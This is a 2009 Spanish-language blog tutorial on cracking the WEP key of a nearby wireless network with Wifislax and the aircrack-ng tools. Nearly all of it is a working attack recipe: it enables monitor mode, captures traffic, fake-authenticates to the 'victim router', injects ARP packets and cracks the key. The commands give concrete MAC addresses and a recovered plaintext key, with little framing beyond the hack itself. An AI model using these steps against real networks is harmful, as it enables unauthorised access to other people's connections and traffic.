miércoles, 29 de julio de 2009

Como hackear clave WEP en red inalambrica - Wifislax

1. Configurar la interfaz de red en modo "Monitor" sobre el canal en el que se encuentra el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.

3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.

#iwconfig wifi0 rate 1M

4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0

donde aaaa puede ser cualquier nombre para este archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax

En este ejemplo encontramos una ESSID:LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6

5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida

6. Ahora empezaremos a intectar paquetes usando el siguiente comando:

#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0

Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.


7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap

Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.

.....

Equivalente en ASCII: LADINO4763356



Congratulations!!! Clave detectada!!!

No hay comentarios:

Publicar un comentario